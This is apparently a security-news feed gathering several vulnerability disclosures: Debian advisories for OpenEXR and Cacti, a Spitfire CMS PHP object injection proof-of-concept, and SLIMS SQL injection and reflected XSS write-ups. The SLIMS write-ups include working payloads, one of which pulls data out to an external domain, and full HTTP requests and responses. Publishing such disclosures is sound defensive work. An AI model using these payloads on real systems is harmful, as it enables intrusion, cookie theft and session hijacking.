Debian Linux Security Advisory 5299-1 - Multiple security vulnerabilities have been found in OpenEXR, command-line tools and a library for the OpenEXR image format. Buffer overflows or out-of-bound reads could lead to a denial of service (application crash) if a malformed image file is processed.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5299-1                   security@debian.org  
https://www.debian.org/security/                          Markus Koschany  
December 10, 2022                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : openexr  
CVE ID         : CVE-2021-3598 CVE-2021-3605 CVE-2021-3933 CVE-2021-3941  
                 CVE-2021-23215 CVE-2021-26260 CVE-2021-45942  
Debian Bug     : 992703 990450 990899 1014828 1014828

Multiple security vulnerabilities have been found in OpenEXR, command-line  
tools and a library for the OpenEXR image format. Buffer overflows or  
out-of-bound reads could lead to a denial of service (application crash) if a  
malformed image file is processed.

For the stable distribution (bullseye), these problems have been fixed in  
version 2.5.4-2+deb11u1.

We recommend that you upgrade your openexr packages.

For the detailed security status of openexr please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/openexr

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmOUsp1fFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFD  
RjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7  
UeSfCg/9GD/cedF6yXuvTz4E68wdwJSZD+FVs840/miN6I0VBtvaApLUVZbyHd2w  
6SjC0G3qdmG8UkczUM/+YFl6O1D6qfLcr4vtZwqgu6SzG9wiA5CyogE1afe9ff1d  
bmS7/zv+WZEUUY9oC+px6yLLKOozsiHJlHB1FWcLaYWj+oFGVs83+PU5deErBCXY  
bbcR0pv+dMAnodhsyCmLr34nyaPfXUzdEI0cdXA63jJm/hOZAlDkUXLddljBCSDt  
GqhNbGDMdgitgxGgYC0MgduaOjprtzxdIJ7KRv4hLJiQB3P3oC2YyyxtCGFRLtKW  
X936b8AdGmUjzWeKURogRTuPDaZkO4DRQOZErBrYyxl2tCs4G29b/PQoO/0tPMlM  
aAH3ccT1FaSg2StM7VmfYaq8Fom7xoDbkEc76+ZSj3E6khhaZpRE2KENm9k042OE  
3y4UQXqYhF/8YKE6WLWBrPhj9kYVHXIBFyKuuZlLXkG2rYsa9Mx11MXfNtRto5ml  
8GITQNB53z+LwVmuFVwkBN1wLDJdGpEvuvsm2+xwzvyAtKYPDWIavuoWbIgHeMur  
7YS8ZGswgyzbDeMx/DsL+9ZGycIddZFddsE8Ag9fBlYrwIs26kBqGN3Zn9ELOVmW  
/w2jcYgAWV9HRxobpP4i73cmPsg7thBSEseeN5ypNYGZSMNWS50=  
=S4Eq  
-----END PGP SIGNATURE-----

Debian Security Advisory 5299-1

Security Explorations conducted a security analysis of Microsoft Play Ready content protection technology in the environment of the CANAL+ SAT TV provider. As a result, complete access to movie assets and content keys available in the CANAL+ VOD library could be gained with the use of a fake client device identity. Microsoft and CANAL+ have seemingly decided to ignore this large laundry list of failures.

CANAL+ / Microsoft PlayReady Cryptography Shortcomings / Authorization Bypass

Debian Linux Security Advisory 5298-1 - Two security vulnerabilities have been discovered in Cacti, a web interface for graphing of monitoring systems, which could result in unauthenticated command injection or LDAP authentication bypass.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5298-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffDecember 09, 2022                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : cactiCVE ID         : CVE-2022-0730 CVE-2022-46169Debian Bug     : 1008693 1025648Two security vulnerabilities have been discovered in Cacti, a webinterface for graphing of monitoring systems, which could result inunauthenticated command injection or LDAP authentication bypass.For the stable distribution (bullseye), these problems have been fixed inversion 1.2.16+ds1-2+deb11u1.We recommend that you upgrade your cacti packages.For the detailed security status of cacti please refer toits security tracker page at:https://security-tracker.debian.org/tracker/cactiFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmOTiuUACgkQEMKTtsN8TjZelw/+IK8TVgkeBtodhDZpUpUlrBmGTZy/GQAGhCL7l5tVyDyrUySYlZWQg8dbKHJHTGBIxSmsqkK923y/ddZApQreteoAIPyY5VVZ8EmSa7k+tzIvEUkJKlqDEnBlavQth37WaDsB4OYRW+bWMnCrvMhBzMIuuJOIdPAA5nNyhSgGiwxjbrMtInXFavd9k+WO3FMoxD5Jdzc3BvFLH+NJJl4KP/E96WaHenOYonTkpu1ATEo2uqCA0jdWC1dWPtieLAvZvOKR9a8eieWLoKHn5GK9tsYN1VEqwPGdqLHe6vOmreUEqtnq86uNZ1RhYtv2uGWdRVs6jCUKUM8yM5qTBXHLqpaDVoOfHfRhQEI2anZlcFNuXXv3yEHOpWzanTlC7ncAbCF8kC0gzQ0nhb0AWehIwNsslxre8++FVjLlPHoppaaUlgwt3NFkq9ITs9MVohvp1RunSUig9/8Z9Im6U1o51rbbSWSjOGyFSNjljcoHJ1WOoVit/PIAyhIhU1gaUV2hqIc+owaWo+LV/zSC9Myv3IxhUGoryuozM+z2krXk+ywzMcVR3kWXyY2qqMmHRkljnYknchoSDJd0bthwQ5t0daGnzLoqeql8hwOveN7hVIDg5SCOnybgesjVQN9x8leb9OifmVOA7Gj3sYP9Czmh1kWqvNwM2KROo8tyDszsl78==mHv/-----END PGP SIGNATURE-----

Debian Security Advisory 5298-1

Spitfire CMS version 1.0.475 is prone to a PHP object injection vulnerability due to the unsafe use of unserialize() function. A potential attacker, authenticated, could exploit this vulnerability by sending specially crafted requests to the web application containing malicious serialized input.

    Spitfire CMS 1.0.475 (cms_backup_values) PHP Object InjectionVendor: Claus MuusProduct web page: http://spitfire.clausmuus.deAffected version: 1.0.475Summary: Spitfire is a system to manage the content of webpages.Desc: The application is prone to a PHP Object Injection vulnerabilitydue to the unsafe use of unserialize() function. A potential attacker,authenticated, could exploit this vulnerability by sending speciallycrafted requests to the web application containing malicious serializedinput.-----------------------------------------------------------------------cms/edit/tpl_backup.inc.php:----------------------------47:  private function status ()48:  {49:      $status = array ();50:51:      $status['values'] = array ();52:      $status['values'] = isset ($_COOKIE['cms_backup_values']) ? unserialize ($_COOKIE['cms_backup_values']) : array ();......77:  public function save ($values)78:  {79:      $values = array_merge ($this->status['values'], $values);80:      setcookie ('cms_backup_values', serialize ($values), time()+60*60*24*30);81:  }-----------------------------------------------------------------------Tested on: nginxVulnerability discovered by Gjoko 'LiquidWorm' Krstic                            @zeroscienceAdvisory ID: ZSL-2022-5720Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5720.php28.09.2022--> curl -isk -XPOST http://10.0.0.2/cms/edit/tpl_backup_action.php \       -H 'Content-Type: application/x-www-form-urlencoded'       -H 'Accept: */*'       -H 'Referer: http://10.0.0.2/cms/edit/cont_index.php?tpl=backup'       -H 'Accept-Encoding: gzip, deflate'       -H 'Accept-Language: en-US,en;q=0.9'       -H 'Connection: close' \       -H 'Cookie: tip=0; cms_backup_values=O%3a3%3a%22ZSL%22%3a0%3a%7b%7d; cms_username=admin; PHPSESSID=0e63d3a8762f4bff95050d1146db8c1c' \       --data 'action=save&&value=1'      #--data 'action=save&&value[files]={}'

Spitfire CMS 1.0.475 PHP Object Injection

Senayan Library Management System 9.1.0 suffers from a remote SQL injection vulnerability.

    ## Title: Senayan Library Management System v9.1.0 a.k.a SLIMS 9 SQLi## Author: nu11secur1ty## Date: 11.09.2022## Vendor: https://slims.web.id/web/## Software: https://github.com/slims/slims9_bulian/releases/download/v9.1.0/slims9_bulian-9.1.0.zip## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.1.0/SQLin## Description:The manual insertion `point 3` with the `class` parameter appears tobe vulnerable to SQL injection attacks.A single quote was submitted in the manual insertion `point 3`, and ageneral error message was returned.Two single quotes were then submitted and the error message disappeared.## STATUS: HIGH Vulnerability[+] Payload:```MySQL---Parameter: class (GET)    Type: boolean-based blind    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BYor GROUP BY clause    Payload: reportView=true&year=2002&class=bbbb''' RLIKE (SELECT(CASE WHEN (8842=8842) THEN 0x626262622727 ELSE 0x28 END)) AND'iuDJ'='iuDJ&membershipType=a''&collType=aaaa---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.1.0/SQLin)## Proof and Exploit:[href](https://streamable.com/qptgmu)## Time spent`01:00:00`System Administrator - Infrastructure EngineerPenetration Testing EngineerExploit developer athttps://packetstormsecurity.com/https://cve.mitre.org/index.html andhttps://www.exploit-db.com/home page: https://www.nu11secur1ty.com/hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=                          nu11secur1ty <http://nu11secur1ty.com/>-- System Administrator - Infrastructure EngineerPenetration Testing EngineerExploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.html and https://www.exploit-db.com/home page: https://www.nu11secur1ty.com/hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=                          nu11secur1ty <http://nu11secur1ty.com/>

Senayan Library Management System 9.1.0 SQL Injection

Senayan Library Management System version 9.0.l0 suffers from a remote SQL injection vulnerability.

    ## Title: Senayan Library Management System v9.0.0 a.k.a SLIMS 9 SQLi## Author: nu11secur1ty## Date: 11.09.2022## Vendor: https://slims.web.id/web/## Software: https://github.com/slims/slims9_bulian/releases/download/v9.0.0/slims9_bulian-9.0.0.zip## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.0.0/SQLi## Description:The manual insertion `point 3` with `class` parameter appears to bevulnerable to SQL injection attacks.The payload '+(selectload_file('\\\\0absu0byc9uwy8ivftx7f6auul0fo5cwfk6at2hr.again.com\\fbe'))+'was submitted in the manual insertion point 3.This payload injects a SQL sub-query that calls MySQL's load_filefunction with a UNC file path that references a URL on an externaldomain.The application interacted with that domain, indicating that theinjected SQL query was executed.## STATUS: HIGH Vulnerability[+] Payload:```MySQL---Parameter: class (GET)    Type: boolean-based blind    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BYor GROUP BY clause    Payload: reportView=true&year=2002&class=bbbb''' RLIKE (SELECT(CASE WHEN (2547=2547) THEN 0x626262622727 ELSE 0x28 END)) AND'dLjf'='dLjf&membershipType=a&collType=aaaa---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.0.0/SQLi)## Proof and Exploit:[href](http://localhost:5001/sy5wji)## Time spent`03:00:00`

Senayan Library Management System 9.0.0 SQL Injection

Senayan Library Management System version 9.0.0 suffers from a cross site scripting vulnerability.

## Title: Senayan Library Management System v9.0.0 a.k.a SLIMS 9Multiple XSS-Reflected vulnerabilities## Author: nu11secur1ty## Date: 12.09.2022## Vendor: https://slims.web.id/web/## Software: https://github.com/slims/slims9_bulian/releases/download/v9.0.0/slims9_bulian-9.0.0.zip## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.0.0## Description:The value of the keywords request parameter is copied into the valueof an HTML tag attribute which is encapsulated in double quotationmarks.The payload m8vzl"><script>alert(hello_vulnerability)</script>hidhcwas submitted in the keywords parameter.This input was echoed unmodified in the application's response.## STATUS: HIGH Vulnerability[+] Payload:```GETGET /slims9_bulian-9.0.0/index.php?search=search&keywords=m8vzl"><script>alert(document.cookie)</script>hidhcHTTP/1.1Host: pwnedhost.comAccept-Encoding: gzip, deflateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Connection: closeCache-Control: max-age=0Cookie: SenayanMember=aoujjbpmorr1km0t1j9g5cnhjuUpgrade-Insecure-Requests: 1Referer: http://pwnedhost.com/slims9_bulian-9.0.0/index.php?search=search&keywords=wd4iuxeo08r8d72ubgugx0nc5fylp2k6o9l4h6ywnSec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0Content-Length: 0```[+] Response:```HTTP/1HTTP/1.1 200 OKDate: Fri, 09 Dec 2022 06:23:20 GMTServer: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30X-Frame-Options: SAMEORIGINX-Powered-By: PHP/7.4.30Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheX-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/html; charset=UTF-8Content-Length: 29492<!DOCTYPE html><html><head>    <meta charset="utf-8">    <title>Open Source Library Management System | Senayan</title>    <meta name="viewport" content="width=device-width,initial-scale=1, shrink-to-fit=no">    <meta http-equiv="X-UA-Compatible" content="IE=edge">    <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>    <meta http-equiv="Pragma" content="no-cache"/>    <meta http-equiv="Cache-Control" content="no-store, no-cache,must-revalidate, post-check=0, pre-check=0"/>    <meta http-equiv="Expires" content="Sat, 26 Jul 1997 05:00:00 GMT"/>        <meta name="description" content="Open Source LibraryManagement System | Senayan">      <meta name="keywords" content="Open Source Library Management System">      <meta name="viewport" content="width=device-width,height=device-height, initial-scale=1">    <meta name="generator" content="SLiMS 9 (Bulian)">    <meta name="theme-color" content="#000">    <meta property="og:locale" content="en_US"/>    <meta property="og:type" content="book"/>    <meta property="og:title" content="Open Source Library ManagementSystem | Senayan"/>        <meta property="og:description" content="Open Source LibraryManagement System"/>      <meta property="og:url"content="//pwnedhost.com/slims9_bulian-9.0.0/index.php?search=search&keywords=m8vzl"><script>alert(document.cookie)</script>hidhc"/>```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.0.0)## Proof and Exploit:[href](https://streamable.com/ac60v3)## Time spent`01:00:00`

Senayan Library Management System 9.0.0 Cross Site Scripting

Senayan Library Management System version 9.4.0 suffers from a cross site scripting vulnerability.

## Title: Senayan Library Management System v9.4.0 a.k.a SLIMS 9XSS-Reflected- PHPSESSID Hijacking## Author: nu11secur1ty## Date: 12.08.2022## Vendor: https://slims.web.id/web/## Software: https://slims.web.id/web/news/rilis-9.4.0/## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.4.0## Description:The value of the `destination` request parameter is copied into thevalue of an HTML tag attribute which is encapsulated in doublequotation marks.The payload zbuip"><script>alert(hello_vulnerability)</script>jgoihbmmyglwas submitted in the destination parameter.This input was echoed unmodified in the application's response. Theattacker can hijack the session of some users of the system.## STATUS: HIGH Vulnerability[+] Payload:```GETGET /slims9_bulian-9.4.0/index.php?p=member&destination=zbuip%22%3e%3cscript%3ealert(document.cookie)%3c%2fscript%3ejgoihbmmygl&memberID=admin&memberPassWord=password&_csrf_token_645a83a41868941e4692aa31e7235f2=6a50886006f02202a6dac5cfa07bcbfb1e2a6e84&logMeIn=LoginHTTP/1.1Host: pwnedhost.comAccept-Encoding: gzip, deflateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Connection: closeCache-Control: max-age=0Cookie: SenayanMember=82qkie4ai1alsk0gtbge7rc48mOrigin: http://pwnedhost.comUpgrade-Insecure-Requests: 1Referer: http://pwnedhost.com/slims9_bulian-9.4.0/index.php?p=memberSec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0```[+] Response:```HTTP/1HTTP/1.1 200 OKDate: Thu, 08 Dec 2022 18:43:20 GMTServer: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30X-Frame-Options: SAMEORIGINX-Powered-By: PHP/7.4.30Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheX-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/html; charset=UTF-8Content-Length: 30590<!DOCTYPE html><html><head>    <meta charset="utf-8">    <title>Open Source Library Management System | Senayan</title>    <meta name="viewport" content="width=device-width,initial-scale=1, shrink-to-fit=no">    <meta http-equiv="X-UA-Compatible" content="IE=edge">    <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>    <meta http-equiv="Pragma" content="no-cache"/>    <meta http-equiv="Cache-Control" content="no-store, no-cache,must-revalidate, post-check=0, pre-check=0"/>    <meta http-equiv="Expires" content="Sat, 26 Jul 1997 05:00:00 GMT"/>    <meta name="robots" content="noindex, follow">        <metaname="description" content="Open Source Library Management System |Senayan">      <meta name="keywords" content="Open Source Library Management System">      <meta name="viewport" content="width=device-width,height=device-height, initial-scale=1">    <meta name="generator" content="SLiMS 9 (Bulian)">    <meta name="theme-color" content="#000">    <meta property="og:locale" content="en_US"/>    <meta property="og:type" content="book"/>    <meta property="og:title" content="Open Source Library ManagementSystem | Senayan"/>        <meta property="og:description" content="Open Source LibraryManagement System"/>      <meta property="og:url"content="//pwnedhost.com%2Fslims9_bulian-9.4.0%2Findex.php%3Fp%3Dmember%26destination%3Dzbuip%22%3Ealert%28document.cookie%29jgoihbmmygl%26memberID%3Dadmin%26memberPassWord%3Dpassword%26_csrf_token_645a83a41868941e4692aa31e7235f2%3D6a50886006f02202a6dac5cfa07bcbfb1e2a6e84%26logMeIn%3DLogin"/>    <meta property="og:site_name" content="Senayan"/>        <meta property="og:image"            content="//pwnedhost.com/slims9_bulian-9.4.0/template/default/img/logo.png"/>    <meta name="twitter:card" content="summary">    <meta name="twitter:url"content="//pwnedhost.com%2Fslims9_bulian-9.4.0%2Findex.php%3Fp%3Dmember%26destination%3Dzbuip%22%3Ealert%28document.cookie%29jgoihbmmygl%26memberID%3Dadmin%26memberPassWord%3Dpassword%26_csrf_token_645a83a41868941e4692aa31e7235f2%3D6a50886006f02202a6dac5cfa07bcbfb1e2a6e84%26logMeIn%3DLogin"/>    <meta name="twitter:title" content="Open Source Library ManagementSystem | Senayan"/>        <meta property="twitter:image"            content="//pwnedhost.com/slims9_bulian-9.4.0/template/default/img/logo.png"/>          <link rel="stylesheet" href="template/default/assets/css/bootstrap.min.css">        <link rel="stylesheet"href="template/default/assets/plugin/font-awesome/css/fontawesome-all.min.css">        <link rel="stylesheet" href="template/default/assets/css/tailwind.min.css">        <link rel="stylesheet"href="template/default/assets/plugin/vegas/vegas.min.css">    <link href="/slims9_bulian-9.4.0/js/toastr/toastr.min.css?31014320"rel="stylesheet" type="text/css"/>        <link rel="stylesheet" href="/slims9_bulian-9.4.0/js/colorbox/colorbox.css">        <link rel="stylesheet" href="template/default/assets/css/flag-icon.min.css">        <link rel="stylesheet"href="template/default/assets/css/style.css?v=20221209-014320">    <link rel="shortcut icon" href="webicon.ico" type="image/x-icon"/>        <script src="template/default/assets/js/vue.min.js"></script>        <script src="template/default/assets/js/jquery.min.js"></script>        <script src="template/default/assets/js/popper.min.js"></script>        <script src="template/default/assets/js/bootstrap.min.js"></script>        <script src="template/default/assets/plugin/vegas/vegas.min.js"></script>    <script src="/slims9_bulian-9.4.0/js/toastr/toastr.min.js"></script>        <script src="/slims9_bulian-9.4.0/js/colorbox/jquery.colorbox-min.js"></script>    <script src="/slims9_bulian-9.4.0/js/gui.js"></script>    <script src="/slims9_bulian-9.4.0/js/fancywebsocket.js"></script></head><body class="bg-grey-lightest">    <div class="result-search page-member-area">        <section id="section1 container-fluid">            <header class="c-header">                <div class="mask"></div><nav class="navbar navbar-expand-lg navbar-dark bg-transparent">    <a class="navbar-brand inline-flex items-center" href="index.php">                <svg            class="fill-current text-white inline-block h-8 w-8"            version="1.1"            xmlns="http://www.w3.org/2000/svg"xmlns:xlink="http://www.w3.org/1999/xlink"            viewBox="0 0 118.4 135" style="enable-background:new 0 0 118.4 135;"            xml:space="preserve">                <pathd="M118.3,98.3l0-62.3l0-0.2c-0.1-1.6-1-3-2.3-3.9c-0.1,0-0.1-0.1-0.2-0.1L61.9,0.8c-1.7-1-3.9-1-5.4-0.1l-54,31.1l-0.4,0.2C0.9,33,0.1,34.4,0,36c0,0.1,0,0.2,0,0.3l0,62.4l0,0.3c0.1,1.6,1,3,2.3,3.9c0.1,0.1,0.2,0.1,0.2,0.2l53.9,31.1l0.3,0.2c0.8,0.4,1.6,0.6,2.4,0.6c0.8,0,1.5-0.2,2.2-0.5l53.9-31.1c0.3-0.1,0.6-0.3,0.9-0.5c1.2-0.9,2-2.3,2.1-3.7c0-0.1,0-0.3,0-0.4                C118.4,98.6,118.3,98.5,118.3,98.3zM114.4,98.8c0,0.3-0.2,0.7-0.5,0.9c-0.1,0.1-0.2,0.1-0.2,0.1l-20.6,11.9L59.2,92.1l-33.9,19.6L4.6,99.7l0,0l0,0C4.2,99.5,4,99.2,4,98.8l0-62.5l0,0l0-0.1c0-0.4,0.2-0.7,0.5-0.9l20.8-12l33.9,19.6l33.9-19.6l20.6,11.9l0.1,0                c0.3,0.2,0.5,0.5,0.6,0.9l0,62.3L114.4,98.8L114.4,98.8zM95.3,68.6v39.4L23.1,66.4V26.9L95.3,68.6z"/>         </svg>                <div class="inline-flex flex-col leading-tight ml-2">            <h1 class="text-lg m-0 p-0">Senayan</h1>                    </div>    </a>    <button class="navbar-toggler" type="button"data-toggle="collapse" data-target="#navbarSupportedContent"            aria-controls="navbarSupportedContent"aria-expanded="false" aria-label="Toggle navigation">        <span class="navbar-toggler-icon"></span>    </button>    <div class="collapse navbar-collapse" id="navbarSupportedContent">        <ul class="navbar-nav ml-auto">          <li class="nav-item ">    <a class="nav-link" href="index.php">Home</a></li><li class="nav-item ">    <a class="nav-link" href="index.php?p=libinfo">Information</a></li><li class="nav-item ">    <a class="nav-link" href="index.php?p=news">News</a></li><li class="nav-item ">    <a class="nav-link" href="index.php?p=help">Help</a></li><li class="nav-item ">    <a class="nav-link" href="index.php?p=librarian">Librarian</a></li>                        <li class="nav-item active">                  <a class="nav-link" href="index.php?p=member">Member Area</a>              </li>                      <li class="nav-item dropdown">                              <a class="nav-link dropdown-togglecursor-pointer" type="button" id="languageMenuButton"                   data-toggle="dropdown" aria-haspopup="true"aria-expanded="false">                    <span class="flag-icon flag-icon-us"style="border-radius: 2px;"></span>                </a>                <div class="dropdown-menu bg-grey-lighterdropdown-menu-lg-right" aria-labelledby="dropdownMenuButton">                    <h6 class="dropdown-header">Select Language : </h6>                      <a class="dropdown-item"href="index.php?select_lang=ar_SA">        <span class="flag-icon flag-icon-sa mr-2"style="border-radius: 2px;"></span> Arabic    </a>    <a class="dropdown-item" href="index.php?select_lang=bn_BD">        <span class="flag-icon flag-icon-bd mr-2"style="border-radius: 2px;"></span> Bengali    </a>    <a class="dropdown-item" href="index.php?select_lang=pt_BR">        <span class="flag-icon flag-icon-br mr-2"style="border-radius: 2px;"></span> Brazilian Portuguese    </a>    <a class="dropdown-item" href="index.php?select_lang=en_US">        <span class="flag-icon flag-icon-us mr-2"style="border-radius: 2px;"></span> English    </a>    <a class="dropdown-item" href="index.php?select_lang=es_ES">        <span class="flag-icon flag-icon-es mr-2"style="border-radius: 2px;"></span> Espanol    </a>    <a class="dropdown-item" href="index.php?select_lang=de_DE">        <span class="flag-icon flag-icon-de mr-2"style="border-radius: 2px;"></span> German    </a>    <a class="dropdown-item" href="index.php?select_lang=id_ID">        <span class="flag-icon flag-icon-id mr-2"style="border-radius: 2px;"></span> Indonesian    </a>    <a class="dropdown-item" href="index.php?select_lang=ja_JP">        <span class="flag-icon flag-icon-jp mr-2"style="border-radius: 2px;"></span> Japanese    </a>    <a class="dropdown-item" href="index.php?select_lang=my_MY">        <span class="flag-icon flag-icon-my mr-2"style="border-radius: 2px;"></span> Malay    </a>    <a class="dropdown-item" href="index.php?select_lang=fa_IR">        <span class="flag-icon flag-icon-ir mr-2"style="border-radius: 2px;"></span> Persian    </a>    <a class="dropdown-item" href="index.php?select_lang=ru_RU">        <span class="flag-icon flag-icon-ru mr-2"style="border-radius: 2px;"></span> Russian    </a>    <a class="dropdown-item" href="index.php?select_lang=th_TH">        <span class="flag-icon flag-icon-th mr-2"style="border-radius: 2px;"></span> Thai    </a>    <a class="dropdown-item" href="index.php?select_lang=tr_TR">        <span class="flag-icon flag-icon-tr mr-2"style="border-radius: 2px;"></span> Turkish    </a>    <a class="dropdown-item" href="index.php?select_lang=ur_PK">        <span class="flag-icon flag-icon-pk mr-2"style="border-radius: 2px;"></span> Urdu    </a>                </div>            </li>        </ul>    </div></nav>            </header>          <div class="search" id="search-wraper"xmlns:v-bind="http://www.w3.org/1999/xhtml">    <div class="container">        <div class="row">            <div class="col-lg-8 mx-auto">                <div class="card border-0 shadow">                    <div class="card-body">                        <form class="" action="index.php" method="get"@submit.prevent="searchSubmit">                            <input type="hidden" name="search" value="search">                            <input ref="keywords" value=""v-model.trim="keywords"                                   @focus="searchOnFocus"@blur="searchOnBlur" type="text" id="search-input"                                   name="keywords"class="input-transparent w-100" autocomplete="off"                                   placeholder="Enter keyword tosearch collection..."/>                        </form>                    </div>                </div>                <transition name="slide-fade">                    <div v-if="show" class="advanced-wraper shadowmt-4" id="advanced-wraper"                         v-click-outside="hideSearch">                        <p class="label mb-2">                            Search by :                            <i@click="hideSearch"                               class="far fa-times-circle float-righttext-danger cursor-pointer"></i>                        </p>                        <div class="d-flex flex-wrap">                            <a v-bind:class="{'btn-primarytext-white': searchBy === 'keywords', 'btn-outline-secondary':searchBy !== 'keywords' }"                               @click="searchOnClick('keywords')"class="btn mr-2 mb-2">ALL</a>                            <a v-bind:class="{'btn-primarytext-white': searchBy === 'author', 'btn-outline-secondary': searchBy!== 'author' }"                               @click="searchOnClick('author')"class="btn mr-2 mb-2">Author</a>                            <a v-bind:class="{'btn-primarytext-white': searchBy === 'subject', 'btn-outline-secondary': searchBy!== 'subject' }"                               @click="searchOnClick('subject')"class="btn mr-2 mb-2">Subject</a>                            <a v-bind:class="{'btn-primarytext-white': searchBy === 'isbn', 'btn-outline-secondary': searchBy!== 'isbn' }"                               @click="searchOnClick('isbn')"class="btn mr-2 mb-2">ISBN/ISSN</a>                            <button class="btn btn-light mr-2 mb-2"disabled>OR TRY</button>                            <a class="btn btn-outline-primary mr-2mb-2" data-toggle="modal" data-target="#adv-modal">Advanced Search</a>                        </div>                        <p v-if="lastKeywords.length > 0" class="labelmt-4">Last search:</p>                        <a:href="`index.php?${tmpObj[k].searchBy}=${tmpObj[k].text}&search=search`"                           class="flex items-center justify-betweenpy-1 text-decoration-none text-grey-darkest hover:text-blue"                           v-for="k in lastKeywords" :key="k"><span><i                                        class="far fa-clocktext-grey-dark mr-2"></i><span class="italictext-sm">{{tmpObj[k].text}}</span></span><i                                    class="fas fa-angle-righttext-grey-dark"></i></a>                    </div>                </transition>            </div>        </div>    </div></div>        </section>        <div class="container py-4">          <div class="row">              <div class="col-md-8">                    <div>        <div class="tagline">Library Member Login</div>                <div class="loginInfo">Please insert your member IDand password given by library system administrator. If you arelibrary's member and don't have a password yet, please contact librarystaff.</div>        <div class="loginInfo">            <formaction="index.php?p=member&destination=zbuip"><script>alert(document.cookie)</script>jgoihbmmygl"method="post">                <div class="fieldLabel">Member ID</div>```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.4.0)## Proof and Exploit:[href](https://streamable.com/dsl863)## Time spent`01:30:00`

Senayan Library Management System 9.4.0 Cross Site Scripting

ILIAS eLearning versions 7.15 and below suffer from authenticated command injection, persistent cross site scripting, local file inclusion, and open redirection vulnerabilities.

SEC Consult Vulnerability Lab Security Advisory < 20221206-0 >  
=======================================================================  
               title: Multiple critical vulnerabilities  
             product: ILIAS eLearning platform  
  vulnerable version: <= 7.15  
       fixed version: 7.16  
          CVE number: CVE-2022-45915, CVE-2022-45916, CVE-2022-45917,  
                      CVE-2022-45918  
              impact: critical  
            homepage: https://www.ilias.de  
               found: 2022-09-30  
                  by: Anna Hartig (Office Bochum)  
                      Constantin Schwarz (Office Bochum)  
                      Niklas Schilling (Office Munich)  
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult, an Atos company  
                      Europe | Asia | North America

                      https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
"Around since 1998, ILIAS is a powerful learning management system that fulfills  
all your requirements. Using its integrated tools, small and large businesses,  
universities, schools and public authorities are able to create tailored,  
individual learning scenarios."

Source: https://www.ilias.de/en/

Business recommendation:  
------------------------  
The vendor provides a patch which should be installed immediately.

SEC Consult highly recommends to perform a thorough security review of the product  
conducted by security professionals to identify and resolve potential further  
security issues.

Vulnerability overview/description:  
-----------------------------------  
